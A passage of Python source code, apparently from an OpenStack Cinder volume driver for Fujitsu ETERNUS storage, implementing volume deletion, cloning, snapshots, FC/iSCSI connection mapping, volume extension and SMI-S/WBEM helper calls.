source_volume_instance)
return (element_path, metadata)
@lockutils.synchronized('ETERNUS-vol', 'cinder-', True)
def _create_local_cloned_volume(self, tgt_vol_instance, src_vol_instance):
"""Create local clone of the specified volume."""
s_volumename = src_vol_instance['ElementName']
t_volumename = tgt_vol_instance['ElementName']
LOG.debug('_create_local_cloned_volume, '
'tgt volume name: %(t_volumename)s, '
'src volume name: %(s_volumename)s, ',
{'t_volumename': t_volumename,
's_volumename': s_volumename})
# Get replicationservice for CreateElementReplica.
repservice = self._find_eternus_service(REPL)
if repservice is None:
msg = _('_create_local_cloned_volume, '
'Replication Service not found.')
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
# Invoke method for create cloned volume from volume.
rc, errordesc, job = self._exec_eternus_service(
'CreateElementReplica',
repservice,
SyncType=self._pywbem_uint(8, '16'),
SourceElement=src_vol_instance.path,
TargetElement=tgt_vol_instance.path)
if rc != 0:
msg = (_('_create_local_cloned_volume, '
'volumename: %(volumename)s, '
'sourcevolumename: %(sourcevolumename)s, '
'source volume instance: %(source_volume)s, '
'target volume instance: %(target_volume)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.')
% {'volumename': t_volumename,
'sourcevolumename': s_volumename,
'source_volume': src_vol_instance.path,
'target_volume': tgt_vol_instance.path,
'rc': rc,
'errordesc': errordesc})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_create_local_cloned_volume, out: %(rc)s, %(job)s.',
{'rc': rc, 'job': job})
def delete_volume(self, volume):
"""Delete volume on ETERNUS."""
LOG.debug('delete_volume, volume id: %s.', volume['id'])
self.conn = self._get_eternus_connection()
vol_exist = self._delete_volume_setting(volume)
if not vol_exist:
LOG.debug('delete_volume, volume not found in 1st check.')
return False
# Check volume existence on ETERNUS again
# because volume is deleted when SnapOPC copysession is deleted.
vol_instance = self._find_lun(volume)
if vol_instance is None:
LOG.debug('delete_volume, volume not found in 2nd check, '
'but no problem.')
return True
self._delete_volume(vol_instance)
return True
@lockutils.synchronized('ETERNUS-vol', 'cinder-', True)
def _delete_volume_setting(self, volume):
"""Delete volume setting (HostAffinity, CopySession) on ETERNUS."""
LOG.debug('_delete_volume_setting, volume id: %s.', volume['id'])
# Check the existence of volume.
volumename = self._create_volume_name(volume['id'])
vol_instance = self._find_lun(volume)
if vol_instance is None:
LOG.info('_delete_volume_setting, volumename:%(volumename)s, '
'volume not found on ETERNUS.',
{'volumename': volumename})
return False
# Delete host-affinity setting remained by unexpected error.
self._unmap_lun(volume, None, force=True)
# Check copy session relating to target volume.
cpsessionlist = self._find_copysession(vol_instance)
delete_copysession_list = []
wait_copysession_list = []
for cpsession in cpsessionlist:
LOG.debug('_delete_volume_setting, '
'volumename: %(volumename)s, '
'cpsession: %(cpsession)s.',
{'volumename': volumename,
'cpsession': cpsession})
if cpsession['SyncedElement'] == vol_instance.path:
# Copy target : other_volume --(copy)--> vol_instance
delete_copysession_list.append(cpsession)
elif cpsession['SystemElement'] == vol_instance.path:
# Copy source : vol_instance --(copy)--> other volume
wait_copysession_list.append(cpsession)
LOG.debug('_delete_volume_setting, '
'wait_cpsession: %(wait_cpsession)s, '
'delete_cpsession: %(delete_cpsession)s.',
{'wait_cpsession': wait_copysession_list,
'delete_cpsession': delete_copysession_list})
for cpsession in wait_copysession_list:
self._wait_for_copy_complete(cpsession)
for cpsession in delete_copysession_list:
self._delete_copysession(cpsession)
LOG.debug('_delete_volume_setting, '
'wait_cpsession: %(wait_cpsession)s, '
'delete_cpsession: %(delete_cpsession)s, complete.',
{'wait_cpsession': wait_copysession_list,
'delete_cpsession': delete_copysession_list})
return True
@lockutils.synchronized('ETERNUS-vol', 'cinder-', True)
def _delete_volume(self, vol_instance):
"""Delete volume on ETERNUS."""
LOG.debug('_delete_volume, volume name: %s.',
vol_instance['ElementName'])
volumename = vol_instance['ElementName']
configservice = self._find_eternus_service(STOR_CONF)
if configservice is None:
msg = (_('_delete_volume, volumename: %(volumename)s, '
'Storage Configuration Service not found.')
% {'volumename': volumename})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_delete_volume, volumename: %(volumename)s, '
'vol_instance: %(vol_instance)s, '
'Method: ReturnToStoragePool.',
{'volumename': volumename,
'vol_instance': vol_instance.path})
# Invoke method for delete volume
rc, errordesc, job = self._exec_eternus_service(
'ReturnToStoragePool',
configservice,
TheElement=vol_instance.path)
if rc != 0:
msg = (_('_delete_volume, volumename: %(volumename)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.')
% {'volumename': volumename,
'rc': rc,
'errordesc': errordesc})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_delete_volume, volumename: %(volumename)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.',
{'volumename': volumename,
'rc': rc,
'errordesc': errordesc})
@lockutils.synchronized('ETERNUS-vol', 'cinder-', True)
def create_snapshot(self, snapshot):
"""Create snapshot using SnapOPC."""
LOG.debug('create_snapshot, '
'snapshot id: %(sid)s, volume id: %(vid)s.',
{'sid': snapshot['id'], 'vid': snapshot['volume_id']})
self.conn = self._get_eternus_connection()
snapshotname = snapshot['name']
volumename = snapshot['volume_name']
vol_id = snapshot['volume_id']
volume = snapshot['volume']
d_volumename = self._create_volume_name(snapshot['id'])
s_volumename = self._create_volume_name(vol_id)
vol_instance = self._find_lun(volume)
repservice = self._find_eternus_service(REPL)
# Check the existence of volume.
if vol_instance is None:
# Volume not found on ETERNUS.
msg = (_('create_snapshot, '
'volumename: %(s_volumename)s, '
'source volume not found on ETERNUS.')
% {'s_volumename': s_volumename})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if repservice is None:
msg = (_('create_snapshot, '
'volumename: %(volumename)s, '
'Replication Service not found.')
% {'volumename': volumename})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
# Get poolname from driver configuration file.
eternus_pool = self._get_drvcfg('EternusSnapPool')
# Check the existence of pool
pool = self._find_pool(eternus_pool)
if pool is None:
msg = (_('create_snapshot, '
'eternus_pool: %(eternus_pool)s, '
'pool not found.')
% {'eternus_pool': eternus_pool})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('create_snapshot, '
'snapshotname: %(snapshotname)s, '
'source volume name: %(volumename)s, '
'vol_instance.path: %(vol_instance)s, '
'dest_volumename: %(d_volumename)s, '
'pool: %(pool)s, '
'Invoke CreateElementReplica.',
{'snapshotname': snapshotname,
'volumename': volumename,
'vol_instance': vol_instance.path,
'd_volumename': d_volumename,
'pool': pool})
# Invoke method for create snapshot
rc, errordesc, job = self._exec_eternus_service(
'CreateElementReplica',
repservice,
ElementName=d_volumename,
TargetPool=pool,
SyncType=self._pywbem_uint(7, '16'),
SourceElement=vol_instance.path)
if rc != 0:
msg = (_('create_snapshot, '
'snapshotname: %(snapshotname)s, '
'source volume name: %(volumename)s, '
'vol_instance.path: %(vol_instance)s, '
'dest volume name: %(d_volumename)s, '
'pool: %(pool)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.')
% {'snapshotname': snapshotname,
'volumename': volumename,
'vol_instance': vol_instance.path,
'd_volumename': d_volumename,
'pool': pool,
'rc': rc,
'errordesc': errordesc})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
else:
element = job['TargetElement']
LOG.debug('create_snapshot, '
'volumename:%(volumename)s, '
'Return code:%(rc)lu, '
'Error:%(errordesc)s.',
{'volumename': volumename,
'rc': rc,
'errordesc': errordesc})
# Create return value.
element_path = {
'classname': element.classname,
'keybindings': {
'CreationClassName': element['CreationClassName'],
'SystemName': element['SystemName'],
'DeviceID': element['DeviceID'],
'SystemCreationClassName': element['SystemCreationClassName']
}
}
sdv_no = "0x" + element['DeviceID'][24:28]
metadata = {'FJ_SDV_Name': d_volumename,
'FJ_SDV_No': sdv_no,
'FJ_Pool_Name': eternus_pool}
return (element_path, metadata)
def delete_snapshot(self, snapshot):
"""Delete snapshot."""
LOG.debug('delete_snapshot, '
'snapshot id: %(sid)s, volume id: %(vid)s.',
{'sid': snapshot['id'], 'vid': snapshot['volume_id']})
vol_exist = self.delete_volume(snapshot)
LOG.debug('delete_snapshot, vol_exist: %s.', vol_exist)
return vol_exist
def initialize_connection(self, volume, connector):
"""Allow connection to connector and return connection info."""
LOG.debug('initialize_connection, '
'volume id: %(vid)s, protocol: %(prtcl)s.',
{'vid': volume['id'], 'prtcl': self.protocol})
self.conn = self._get_eternus_connection()
vol_instance = self._find_lun(volume)
# Check the existence of volume
if vol_instance is None:
# Volume not found
msg = (_('initialize_connection, '
'volume: %(volume)s, '
'Volume not found.')
% {'volume': volume['name']})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
target_portlist = self._get_target_port()
mapdata = self._get_mapdata(vol_instance, connector, target_portlist)
if mapdata:
# volume is already mapped
target_lun = mapdata.get('target_lun', None)
target_luns = mapdata.get('target_luns', None)
LOG.info('initialize_connection, '
'volume: %(volume)s, '
'target_lun: %(target_lun)s, '
'target_luns: %(target_luns)s, '
'Volume is already mapped.',
{'volume': volume['name'],
'target_lun': target_lun,
'target_luns': target_luns})
else:
self._map_lun(vol_instance, connector, target_portlist)
mapdata = self._get_mapdata(vol_instance,
connector, target_portlist)
mapdata['target_discovered'] = True
mapdata['volume_id'] = volume['id']
if self.protocol == 'fc':
device_info = {'driver_volume_type': 'fibre_channel',
'data': mapdata}
elif self.protocol == 'iSCSI':
device_info = {'driver_volume_type': 'iscsi',
'data': mapdata}
LOG.debug('initialize_connection, '
'device_info:%(info)s.',
{'info': device_info})
return device_info
def terminate_connection(self, volume, connector, force=False, **kwargs):
"""Disallow connection from connector."""
LOG.debug('terminate_connection, '
'volume id: %(vid)s, protocol: %(prtcl)s, force: %(frc)s.',
{'vid': volume['id'], 'prtcl': self.protocol, 'frc': force})
self.conn = self._get_eternus_connection()
force = True if not connector else force
map_exist = self._unmap_lun(volume, connector, force)
LOG.debug('terminate_connection, map_exist: %s.', map_exist)
return map_exist
def build_fc_init_tgt_map(self, connector, target_wwn=None):
"""Build parameter for Zone Manager"""
LOG.debug('build_fc_init_tgt_map, target_wwn: %s.', target_wwn)
initiatorlist = self._find_initiator_names(connector)
if target_wwn is None:
target_wwn = []
target_portlist = self._get_target_port()
for target_port in target_portlist:
target_wwn.append(target_port['Name'])
init_tgt_map = {initiator: target_wwn for initiator in initiatorlist}
LOG.debug('build_fc_init_tgt_map, '
'initiator target mapping: %s.', init_tgt_map)
return init_tgt_map
def check_attached_volume_in_zone(self, connector):
"""Check Attached Volume in Same FC Zone or not"""
LOG.debug('check_attached_volume_in_zone, connector: %s.', connector)
aglist = self._find_affinity_group(connector)
if not aglist:
attached = False
else:
attached = True
LOG.debug('check_attached_volume_in_zone, attached: %s.', attached)
return attached
@lockutils.synchronized('ETERNUS-vol', 'cinder-', True)
def extend_volume(self, volume, new_size):
"""Extend volume on ETERNUS."""
LOG.debug('extend_volume, volume id: %(vid)s, '
'size: %(size)s, new_size: %(nsize)s.',
{'vid': volume['id'],
'size': volume['size'], 'nsize': new_size})
self.conn = self._get_eternus_connection()
volumesize = new_size * units.Gi
volumename = self._create_volume_name(volume['id'])
# Get source volume instance.
vol_instance = self._find_lun(volume)
if vol_instance is None:
msg = (_('extend_volume, '
'volumename: %(volumename)s, '
'volume not found.')
% {'volumename': volumename})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('extend_volume, volumename: %(volumename)s, '
'volumesize: %(volumesize)u, '
'volume instance: %(vol_instance)s.',
{'volumename': volumename,
'volumesize': volumesize,
'vol_instance': vol_instance.path})
# Get poolname from driver configuration file.
eternus_pool = self._get_drvcfg('EternusPool')
# Check the existence of volume.
pool = self._find_pool(eternus_pool)
if pool is None:
msg = (_('extend_volume, '
'eternus_pool: %(eternus_pool)s, '
'pool not found.')
% {'eternus_pool': eternus_pool})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
# Set pooltype.
if 'RSP' in pool['InstanceID']:
pooltype = RAIDGROUP
else:
pooltype = TPPOOL
configservice = self._find_eternus_service(STOR_CONF)
if configservice is None:
msg = (_('extend_volume, volume: %(volume)s, '
'volumename: %(volumename)s, '
'eternus_pool: %(eternus_pool)s, '
'Storage Configuration Service not found.')
% {'volume': volume,
'volumename': volumename,
'eternus_pool': eternus_pool})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('extend_volume, '
'CreateOrModifyElementFromStoragePool, '
'ConfigService: %(service)s, '
'ElementName: %(volumename)s, '
'InPool: %(eternus_pool)s, '
'ElementType: %(pooltype)u, '
'Size: %(volumesize)u, '
'TheElement: %(vol_instance)s.',
{'service': configservice,
'volumename': volumename,
'eternus_pool': eternus_pool,
'pooltype': pooltype,
'volumesize': volumesize,
'vol_instance': vol_instance.path})
# Invoke method for extend volume
rc, errordesc, job = self._exec_eternus_service(
'CreateOrModifyElementFromStoragePool',
configservice,
ElementName=volumename,
InPool=pool,
ElementType=self._pywbem_uint(pooltype, '16'),
Size=self._pywbem_uint(volumesize, '64'),
TheElement=vol_instance.path)
if rc != 0:
msg = (_('extend_volume, '
'volumename: %(volumename)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s, '
'PoolType: %(pooltype)s.')
% {'volumename': volumename,
'rc': rc,
'errordesc': errordesc,
'pooltype': POOL_TYPE_dic[pooltype]})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('extend_volume, '
'volumename: %(volumename)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s, '
'Pool Name: %(eternus_pool)s, '
'Pool Type: %(pooltype)s.',
{'volumename': volumename,
'rc': rc,
'errordesc': errordesc,
'eternus_pool': eternus_pool,
'pooltype': POOL_TYPE_dic[pooltype]})
return eternus_pool
@lockutils.synchronized('ETERNUS-update', 'cinder-', True)
def update_volume_stats(self):
"""get pool capacity."""
self.conn = self._get_eternus_connection()
eternus_pool = self._get_drvcfg('EternusPool')
LOG.debug('update_volume_stats, pool name: %s.', eternus_pool)
pool = self._find_pool(eternus_pool, True)
if pool:
# pool is found
self.stats['total_capacity_gb'] = (
pool['TotalManagedSpace'] / units.Gi)
self.stats['free_capacity_gb'] = (
pool['RemainingManagedSpace'] / units.Gi)
else:
# if pool information is unknown, set 0 GB to capacity information
LOG.warning('update_volume_stats, '
'eternus_pool:%(eternus_pool)s, '
'specified pool is not found.',
{'eternus_pool': eternus_pool})
self.stats['total_capacity_gb'] = 0
self.stats['free_capacity_gb'] = 0
self.stats['multiattach'] = False
LOG.debug('update_volume_stats, '
'eternus_pool:%(eternus_pool)s, '
'total capacity[%(total)s], '
'free capacity[%(free)s].',
{'eternus_pool': eternus_pool,
'total': self.stats['total_capacity_gb'],
'free': self.stats['free_capacity_gb']})
return (self.stats, eternus_pool)
def _get_mapdata(self, vol_instance, connector, target_portlist):
"""return mapping information."""
mapdata = None
multipath = connector.get('multipath', False)
LOG.debug('_get_mapdata, volume name: %(vname)s, '
'protocol: %(prtcl)s, multipath: %(mpath)s.',
{'vname': vol_instance['ElementName'],
'prtcl': self.protocol, 'mpath': multipath})
# find affinity group
# attach the connector and include the volume
aglist = self._find_affinity_group(connector, vol_instance)
if not aglist:
LOG.debug('_get_mapdata, ag_list:%s.', aglist)
else:
if self.protocol == 'fc':
mapdata = self._get_mapdata_fc(aglist, vol_instance,
target_portlist)
elif self.protocol == 'iSCSI':
mapdata = self._get_mapdata_iscsi(aglist, vol_instance,
multipath)
LOG.debug('_get_mapdata, mapdata: %s.', mapdata)
return mapdata
def _get_mapdata_fc(self, aglist, vol_instance, target_portlist):
"""_get_mapdata for FibreChannel."""
target_wwn = []
try:
ag_volmaplist = self._reference_eternus_names(
aglist[0],
ResultClass='CIM_ProtocolControllerForUnit')
vo_volmaplist = self._reference_eternus_names(
vol_instance.path,
ResultClass='CIM_ProtocolControllerForUnit')
except pywbem.CIM_Error:
msg = (_('_get_mapdata_fc, '
'getting host-affinity from aglist/vol_instance failed, '
'affinitygroup: %(ag)s, '
'ReferenceNames, '
'cannot connect to ETERNUS.')
% {'ag': aglist[0]})
LOG.exception(msg)
raise exception.VolumeBackendAPIException(data=msg)
volmap = None
for vo_volmap in vo_volmaplist:
if vo_volmap in ag_volmaplist:
volmap = vo_volmap
break
try:
volmapinstance = self._get_eternus_instance(
volmap,
LocalOnly=False)
except pywbem.CIM_Error:
msg = (_('_get_mapdata_fc, '
'getting host-affinity instance failed, '
'volmap: %(volmap)s, '
'GetInstance, '
'cannot connect to ETERNUS.')
% {'volmap': volmap})
LOG.exception(msg)
raise exception.VolumeBackendAPIException(data=msg)
target_lun = int(volmapinstance['DeviceNumber'], 16)
for target_port in target_portlist:
target_wwn.append(target_port['Name'])
mapdata = {'target_wwn': target_wwn,
'target_lun': target_lun}
LOG.debug('_get_mapdata_fc, mapdata: %s.', mapdata)
return mapdata
def _get_mapdata_iscsi(self, aglist, vol_instance, multipath):
"""_get_mapdata for iSCSI."""
target_portals = []
target_iqns = []
target_luns = []
try:
vo_volmaplist = self._reference_eternus_names(
vol_instance.path,
ResultClass='CIM_ProtocolControllerForUnit')
except Exception:
msg = (_('_get_mapdata_iscsi, '
'vol_instance: %(vol_instance)s, '
'ReferenceNames: CIM_ProtocolControllerForUnit, '
'cannot connect to ETERNUS.')
% {'vol_instance': vol_instance})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
target_properties_list = self._get_eternus_iscsi_properties()
target_list = [prop[0] for prop in target_properties_list]
properties_list = (
[(prop[1], prop[2]) for prop in target_properties_list])
for ag in aglist:
try:
iscsi_endpointlist = (
self._assoc_eternus_names(
ag,
AssocClass='FUJITSU_SAPAvailableForElement',
ResultClass='FUJITSU_iSCSIProtocolEndpoint'))
except Exception:
msg = (_('_get_mapdata_iscsi, '
'Associators: FUJITSU_SAPAvailableForElement, '
'cannot connect to ETERNUS.'))
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
iscsi_endpoint = iscsi_endpointlist[0]
if iscsi_endpoint not in target_list:
continue
idx = target_list.index(iscsi_endpoint)
target_portal, target_iqn = properties_list[idx]
try:
ag_volmaplist = self._reference_eternus_names(
ag,
ResultClass='CIM_ProtocolControllerForUnit')
except Exception:
msg = (_('_get_mapdata_iscsi, '
'affinitygroup: %(ag)s, '
'ReferenceNames, '
'cannot connect to ETERNUS.')
% {'ag': ag})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
volmap = None
for vo_volmap in vo_volmaplist:
if vo_volmap in ag_volmaplist:
volmap = vo_volmap
break
if volmap is None:
continue
try:
volmapinstance = self._get_eternus_instance(
volmap,
LocalOnly=False)
except Exception:
msg = (_('_get_mapdata_iscsi, '
'volmap: %(volmap)s, '
'GetInstance, '
'cannot connect to ETERNUS.')
% {'volmap': volmap})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
target_lun = int(volmapinstance['DeviceNumber'], 16)
target_portals.append(target_portal)
target_iqns.append(target_iqn)
target_luns.append(target_lun)
if multipath:
mapdata = {'target_portals': target_portals,
'target_iqns': target_iqns,
'target_luns': target_luns}
else:
mapdata = {'target_portal': target_portals[0],
'target_iqn': target_iqns[0],
'target_lun': target_luns[0]}
LOG.debug('_get_mapdata_iscsi, mapdata: %s.', mapdata)
return mapdata
def _get_drvcfg(self, tagname, filename=None, multiple=False):
"""read from driver configuration file."""
if filename is None:
# set default configuration file name
filename = self.configuration.cinder_eternus_config_file
LOG.debug("_get_drvcfg, input[%(filename)s][%(tagname)s].",
{'filename': filename, 'tagname': tagname})
tree = ET.parse(filename)
elem = tree.getroot()
ret = None
if not multiple:
ret = elem.findtext(".//" + tagname)
else:
ret = []
for e in elem.findall(".//" + tagname):
if (e.text is not None) and (e.text not in ret):
ret.append(e.text)
if not ret:
msg = (_('_get_drvcfg, '
'filename: %(filename)s, '
'tagname: %(tagname)s, '
'data is None!! '
'Please edit driver configuration file and correct.')
% {'filename': filename,
'tagname': tagname})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return ret
def _get_eternus_connection(self, filename=None):
"""return WBEM connection."""
LOG.debug('_get_eternus_connection, filename: %s.', filename)
ip = self._get_drvcfg('EternusIP', filename)
port = self._get_drvcfg('EternusPort', filename)
user = self._get_drvcfg('EternusUser', filename)
passwd = self._get_drvcfg('EternusPassword', filename)
url = 'http://' + ip + ':' + port
conn = pywbem.WBEMConnection(url, (user, passwd),
default_namespace='root/eternus')
if conn is None:
msg = (_('_get_eternus_connection, '
'filename: %(filename)s, '
'ip: %(ip)s, '
'port: %(port)s, '
'user: %(user)s, '
'passwd: ****, '
'url: %(url)s, '
'FAILED!!.')
% {'filename': filename,
'ip': ip,
'port': port,
'user': user,
'url': url})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_get_eternus_connection, conn: %s.', conn)
return conn
def _create_volume_name(self, id_code):
"""create volume_name on ETERNUS from id on OpenStack."""
LOG.debug('_create_volume_name, id_code: %s.', id_code)
if id_code is None:
msg = _('_create_volume_name, id_code is None.')
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
m = hashlib.md5()
m.update(id_code.encode('utf-8'))
# pylint: disable=E1121
volumename = base64.urlsafe_b64encode(m.digest()).decode()
ret = VOL_PREFIX + six.text_type(volumename)
LOG.debug('_create_volume_name, ret: %s', ret)
return ret
def _find_pool(self, eternus_pool, detail=False):
"""find Instance or InstanceName of pool by pool name on ETERNUS."""
LOG.debug('_find_pool, pool name: %s.', eternus_pool)
tppoollist = []
rgpoollist = []
# Get pools info form CIM instance(include info about instance path).
try:
tppoollist = self._enum_eternus_instances(
'FUJITSU_ThinProvisioningPool')
rgpoollist = self._enum_eternus_instances(
'FUJITSU_RAIDStoragePool')
except Exception:
msg = (_('_find_pool, '
'eternus_pool:%(eternus_pool)s, '
'EnumerateInstances, '
'cannot connect to ETERNUS.')
% {'eternus_pool': eternus_pool})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
# Make total pools list.
poollist = tppoollist + rgpoollist
# One eternus backend has only one special pool name
# so just use pool name can get the target pool.
for pool in poollist:
if pool['ElementName'] == eternus_pool:
poolinstance = pool
break
else:
poolinstance = None
if poolinstance is None:
ret = None
elif detail is True:
ret = poolinstance
else:
ret = poolinstance.path
LOG.debug('_find_pool, pool: %s.', ret)
return ret
def _find_eternus_service(self, classname):
"""find CIM instance about service information."""
LOG.debug('_find_eternus_service, '
'classname: %s.', classname)
try:
services = self._enum_eternus_instance_names(
six.text_type(classname))
except Exception:
msg = (_('_find_eternus_service, '
'classname: %(classname)s, '
'EnumerateInstanceNames, '
'cannot connect to ETERNUS.')
% {'classname': classname})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
ret = services[0]
LOG.debug('_find_eternus_service, '
'classname: %(classname)s, '
'ret: %(ret)s.',
{'classname': classname, 'ret': ret})
return ret
@lockutils.synchronized('ETERNUS-SMIS-exec', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _exec_eternus_service(self, classname, instanceNameList, **param_dict):
"""Execute SMI-S Method."""
LOG.debug('_exec_eternus_service, '
'classname: %(a)s, '
'instanceNameList: %(b)s, '
'parameters: %(c)s.',
{'a': classname,
'b': instanceNameList,
'c': param_dict})
# Use InvokeMethod.
try:
rc, retdata = self.conn.InvokeMethod(
classname,
instanceNameList,
**param_dict)
except Exception:
if rc is None:
msg = (_('_exec_eternus_service, '
'classname: %(classname)s, '
'InvokeMethod, '
'cannot connect to ETERNUS.')
% {'classname': classname})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
# If the result has job information, wait for job complete
if "Job" in retdata:
rc = self._wait_for_job_complete(self.conn, retdata)
if rc == DEVICE_IS_BUSY:
msg = _('Device is in Busy state')
raise exception.VolumeBackendAPIException(data=msg)
errordesc = RETCODE_dic.get(six.text_type(rc), UNDEF_MSG)
ret = (rc, errordesc, retdata)
LOG.debug('_exec_eternus_service, '
'classname: %(a)s, '
'instanceNameList: %(b)s, '
'parameters: %(c)s, '
'Return code: %(rc)s, '
'Error: %(errordesc)s, '
'Return data: %(retdata)s.',
{'a': classname,
'b': instanceNameList,
'c': param_dict,
'rc': rc,
'errordesc': errordesc,
'retdata': retdata})
return ret
@lockutils.synchronized('ETERNUS-SMIS-other', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _enum_eternus_instances(self, classname):
"""Enumerate Instances."""
LOG.debug('_enum_eternus_instances, classname: %s.', classname)
ret = self.conn.EnumerateInstances(classname)
LOG.debug('_enum_eternus_instances, enum %d instances.', len(ret))
return ret
@lockutils.synchronized('ETERNUS-SMIS-other', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _enum_eternus_instance_names(self, classname):
"""Enumerate Instance Names."""
LOG.debug('_enum_eternus_instance_names, classname: %s.', classname)
ret = self.conn.EnumerateInstanceNames(classname)
LOG.debug('_enum_eternus_instance_names, enum %d names.', len(ret))
return ret
@lockutils.synchronized('ETERNUS-SMIS-getinstance', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _get_eternus_instance(self, classname, **param_dict):
"""Get Instance."""
LOG.debug('_get_eternus_instance, '
'classname: %(cls)s, param: %(param)s.',
{'cls': classname, 'param': param_dict})
ret = self.conn.GetInstance(classname, **param_dict)
LOG.debug('_get_eternus_instance, ret: %s.', ret)
return ret
@lockutils.synchronized('ETERNUS-SMIS-other', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _assoc_eternus(self, classname, **param_dict):
"""Associator."""
LOG.debug('_assoc_eternus, '
'classname: %(cls)s, param: %(param)s.',
{'cls': classname, 'param': param_dict})
ret = self.conn.Associators(classname, **param_dict)
LOG.debug('_assoc_eternus, enum %d instances.', len(ret))
return ret
@lockutils.synchronized('ETERNUS-SMIS-other', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _assoc_eternus_names(self, classname, **param_dict):
"""Associator Names."""
LOG.debug('_assoc_eternus_names, '
'classname: %(cls)s, param: %(param)s.',
{'cls': classname, 'param': param_dict})
ret = self.conn.AssociatorNames(classname, **param_dict)
LOG.debug('_assoc_eternus_names, enum %d names.', len(ret))
return ret
@lockutils.synchronized('ETERNUS-SMIS-other', 'cinder-', True)
@utils.retry(exception.VolumeBackendAPIException)
def _reference_eternus_names(self, classname, **param_dict):
"""Refference Names."""
LOG.debug('_reference_eternus_names, '
'classname: %(cls)s, param: %(param)s.',
{'cls': classname, 'param': param_dict})
ret = self.conn.ReferenceNames(classname, **param_dict)
LOG.debug('_reference_eternus_names, enum %d names.', len(ret))
return ret
def _create_eternus_instance_name(self, classname, bindings):
"""create CIM InstanceName from classname and bindings."""
LOG.debug('_create_eternus_instance_name, '
'classname: %(cls)s, bindings: %(bind)s.',
{'cls': classname, 'bind': bindings})
instancename = None
try:
instancename = pywbem.CIMInstanceName(
classname,
namespace='root/eternus',
keybindings=bindings)
except NameError:
instancename = None
LOG.debug('_create_eternus_instance_name, ret: %s.', instancename)
return instancename
def _find_lun(self, volume):
"""find lun instance from volume class or volumename on ETERNUS."""
LOG.debug('_find_lun, volume id: %s.', volume['id'])
volumeinstance = None
volumename = self._create_volume_name(volume['id'])
try:
location = ast.literal_eval(volume['provider_location'])
classname = location['classname']
bindings = location['keybindings']
if classname and bindings:
LOG.debug('_find_lun, '
'classname: %(classname)s, '
'bindings: %(bindings)s.',
{'classname': classname,
'bindings': bindings})
volume_instance_name = (
self._create_eternus_instance_name(classname, bindings))
LOG.debug('_find_lun, '
'volume_insatnce_name: %(volume_instance_name)s.',
{'volume_instance_name': volume_instance_name})
vol_instance = (
self._get_eternus_instance(volume_instance_name))
if vol_instance['ElementName'] == volumename:
volumeinstance = vol_instance
except Exception:
volumeinstance = None
LOG.debug('_find_lun, '
'Cannot get volume instance from provider location, '
'Search all volume using EnumerateInstanceNames.')
if volumeinstance is None:
# for old version
LOG.debug('_find_lun, '
'volumename: %(volumename)s.',
{'volumename': volumename})
# get volume instance from volumename on ETERNUS
try:
namelist = self._enum_eternus_instance_names(
'FUJITSU_StorageVolume')
except Exception:
msg = (_('_find_lun, '
'volumename: %(volumename)s, '
'EnumerateInstanceNames, '
'cannot connect to ETERNUS.')
% {'volumename': volumename})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
for name in namelist:
try:
vol_instance = self._get_eternus_instance(name)
if vol_instance['ElementName'] == volumename:
volumeinstance = vol_instance
path = volumeinstance.path
LOG.debug('_find_lun, '
'volumename: %(volumename)s, '
'vol_instance: %(vol_instance)s.',
{'volumename': volumename,
'vol_instance': path})
break
except Exception:
continue
else:
LOG.debug('_find_lun, '
'volumename: %(volumename)s, '
'volume not found on ETERNUS.',
{'volumename': volumename})
LOG.debug('_find_lun, ret: %s.', volumeinstance)
return volumeinstance
def _find_copysession(self, vol_instance):
"""find copysession from volumename on ETERNUS."""
LOG.debug('_find_copysession, volume name: %s.',
vol_instance['ElementName'])
try:
cpsessionlist = self.conn.ReferenceNames(
vol_instance.path,
ResultClass='FUJITSU_StorageSynchronized')
except Exception:
msg = (_('_find_copysession, '
'ReferenceNames, '
'vol_instance: %(vol_instance_path)s, '
'Cannot connect to ETERNUS.')
% {'vol_instance_path': vol_instance.path})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_find_copysession, '
'cpsessionlist: %(cpsessionlist)s.',
{'cpsessionlist': cpsessionlist})
LOG.debug('_find_copysession, ret: %s.', cpsessionlist)
return cpsessionlist
def _wait_for_copy_complete(self, cpsession):
"""Wait for the completion of copy."""
LOG.debug('_wait_for_copy_complete, cpsession: %s.', cpsession)
cpsession_instance = None
while True:
try:
